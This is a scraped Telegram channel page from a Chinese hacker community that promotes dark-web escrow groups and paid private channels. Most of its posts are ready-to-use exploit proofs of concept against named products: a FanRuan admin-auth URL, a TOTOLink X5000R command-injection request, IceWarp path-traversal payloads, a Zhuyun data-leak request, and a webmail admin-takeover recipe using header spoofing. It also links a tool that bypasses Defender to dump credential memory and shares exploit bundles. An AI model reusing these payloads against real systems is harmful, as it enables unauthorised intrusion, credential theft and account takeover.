en
Feedback
黑客自由城 优质内容共享

黑客自由城 优质内容共享

Open in Telegram

telegram最大的黑客交流社区 @Hacker_CityN (核心技术) @Hacker_CityM (核心发布) @DARKWEBEN (担保主群) @DARKWEB_EN2 (渗透推文) @hackerspike (资源交流) @spike_hacker (资源分享) @kaliLinux666 (收款存根) @Hacker_CityL (业务对接) 私有频道联系管理员付费加入

Show more
The country is not specifiedTechnologies & Applications33 626
2 390
Subscribers
-124 hours
-17 days
+330 days
Posts Archive
绕过 PPL,能 bypass WD。 主要功能: 1 绕过PPL保护 2 混淆内存转储文件以逃避 Defender 基于签名的检测机制 3 使用 RAW 和 SMB 上传方法上传内存转储,而不将其放到磁盘上(无文件转储 https://github.com/tastypepperoni/PPLBlade

绕过 Nginx ACL nodes poc

帆软报表系统获取管理员权限 /ReportServer?op=fr_auth&cmd=ah_loginui&_=1619832545582

TOTOLink X5000R 远程命令执行 附POC POST /cgi-bin/cstecgi.cgi HTTP/1.1 {"command":"\r\n pwd > /web/gxh_hrp.txt \r\n","num":"2","topicurl":"setTracerouteCfg"}

CVE-2023-39699:爱思华宝邮件服务器 本地文件包含漏洞 poc https://xxx.xxx.xxx/webmail/calendar/minimizer/index.php?style={path_file} ..\..\..\..\
CVE-2023-39699:爱思华宝邮件服务器 本地文件包含漏洞 poc https://xxx.xxx.xxx/webmail/calendar/minimizer/index.php?style={path_file} ..\..\..\..\..\..\..\..%2fwindows%2fwindowsupdate%2elog ..\..\..\..\..\..\..\..%2fwindows%2fsystem32%2flogfiles%2fhttperr%2fhttperrl%2elog

还交流个鸡巴

密码:santiankejian.cves.io0822

+5
某东CSRF漏洞0822-1.pdf1.07 MB

集成fofa,360鹰图,shadan,zoomeyes等多平台的资产绘测工具,支持批量导出,不限次查询

Search_Viewer (1).exe41.64 MB

+6
Arr3stY0u-第五空间决赛-wp.pdf5.68 KB

竹云 信息泄露 POC POST /admin-api/oauth/../admin/user/findlist Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Accept-Encoding:gzip, deflate Accept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7 Connection:close {"pagesize":改个数,"pageNumber":改个数,"userName":""}

Repost from 踹哈公寓
万户协同办公平台接口存在文件上传漏洞.md0.00 KB

护网期间漏洞汇总200个含POC(下).pdf8.00 MB

护网期间漏洞汇总200个漏洞含POC
护网期间漏洞汇总200个漏洞含POC

WEBMAIL任意用户登录漏洞 /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin 回显是下面这个 "errorMsg":"64d880ce7b737912ccb1" 使用回显的 errormsg 作为密码,用户名为 admin 即可登录 使用手机验证码登录的打不了 显示 IP 受限的话添加头 X-Forwarded-For: 127.0.0.1 即可 如果有回显但登录失败的话,使用 /RmWeb/noCookiesMail?func=user:getPassword&userMailName=admin@+证书 or 根域名获取 errormsg 然后在登录就行了

某JRES CLOUD系统前台任意文件上传漏洞.md0.05 KB

+2
Windows Agent本地权限提升漏洞.pdf4.27 KB